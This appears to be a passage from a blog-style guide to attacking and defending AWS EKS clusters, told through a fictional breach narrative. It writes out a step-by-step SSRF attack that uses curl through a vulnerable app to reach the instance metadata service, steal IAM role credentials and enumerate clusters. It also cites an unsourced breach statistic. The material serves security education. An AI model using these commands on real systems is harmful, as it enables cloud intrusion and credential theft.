AWS EKS Attack and Defend: A DevSecOps Battlefield Guide

"In the chess game of cloud security, Amazon EKS is both the king you must protect and the battlefield where modern cyber warfare unfolds. Every pod is a potential fortress, every service account a gateway, and every misconfiguration a backdoor waiting to be discovered."

Prologue: The Digital Fortress Under Siege

Picture this: It's 3 AM on a Tuesday when Sarah, the Lead DevSecOps engineer at TechCorp, receives an alert that chills her to the bone. Their production EKS cluster—the heartbeat of their multi-million dollar fintech platform—is showing unusual activity. Pods are spawning without authorization, network traffic is spiking to external IPs, and worse yet, their customer database seems to be hemorrhaging data.

This isn't fiction. This is the reality facing organizations worldwide as containerized workloads become the new frontier for both innovation and attack. Welcome to the battlefield of AWS EKS security, where the stakes are measured not just in dollars, but in customer trust, regulatory compliance, and corporate survival.

Chapter 1: Understanding the EKS Ecosystem - A Double-Edged Sword

Amazon Elastic Kubernetes Service (EKS) represents a paradigm shift in how we deploy, manage, and scale applications. Like a medieval castle, it offers powerful defenses when properly configured, but each tower, gate, and bridge can become a vulnerability in the wrong hands.

The Architecture of Opportunity (and Risk)

EKS operates on a shared responsibility model that creates natural friction between convenience and security. AWS manages the Kubernetes control plane, but everything else—worker nodes, pod security, network policies, IAM configurations—falls squarely on your shoulders.

# Understanding your EKS environment - The reconnaissance phase

aws eks list-clusters --region us-west-2

aws eks describe-cluster --name production-cluster --region us-west-2

kubectl get nodes -o wide

kubectl get pods --all-namespaces

The Trust Boundary Illusion

One of the most dangerous misconceptions about EKS is the notion of implicit trust within the cluster. In reality, your EKS cluster is more like a city than a fortress—with different neighborhoods (namespaces), various residents (pods) with different access levels, and numerous entry points that require constant vigilance.

Chapter 2: The Dark Arts - EKS Attack Techniques

Attack Vectors Overview

The following diagrams illustrate the three main attack vectors we'll explore in detail:

Figure 2.1: SSRF Attack Flow - From Web App to Metadata Service Exploitation

Figure 2.2: Pod Privilege Escalation - Container Escape to Cluster Admin

Figure 2.3: Supply Chain Attack - From Development Pipeline to Production Compromise

Attack Vector 1: The SSRF Gateway to AWS Metadata Hell

Our story begins with Alex, a penetration tester hired to assess TechCorp's security posture. Like many modern attacks, this one starts not with sophisticated zero-days, but with a simple misconfiguration.

The attack unfolds like this:

# Step 1: Discovering the vulnerable endpoint

curl "http://vulnerable-app.com/fetch?url=http://169.254.169.254/"

  

# Step 2: Accessing the metadata service through SSRF

curl "http://vulnerable-app.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

  

# Step 3: Extracting IAM role credentials

curl "http://vulnerable-app.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role"

  

# Step 4: Weaponizing the stolen credentials

export AWS_ACCESS_KEY_ID="AKIAEXAMPLE123456789"

export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"

export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEHoaCXVzLXdlc3QtMiJGMEQCIH..."

  

# Step 5: Enumerating EKS resources

aws eks list-clusters

aws eks describe-cluster --name production-cluster

Real-World Impact: In 2023, a major e-commerce platform suffered a breach following this exact pattern, leading to the exposure of 50 million customer records and $47 million in regulatory fines.

Attack Vector 2: Pod Privilege Escalation - Breaking Out of the Container Jail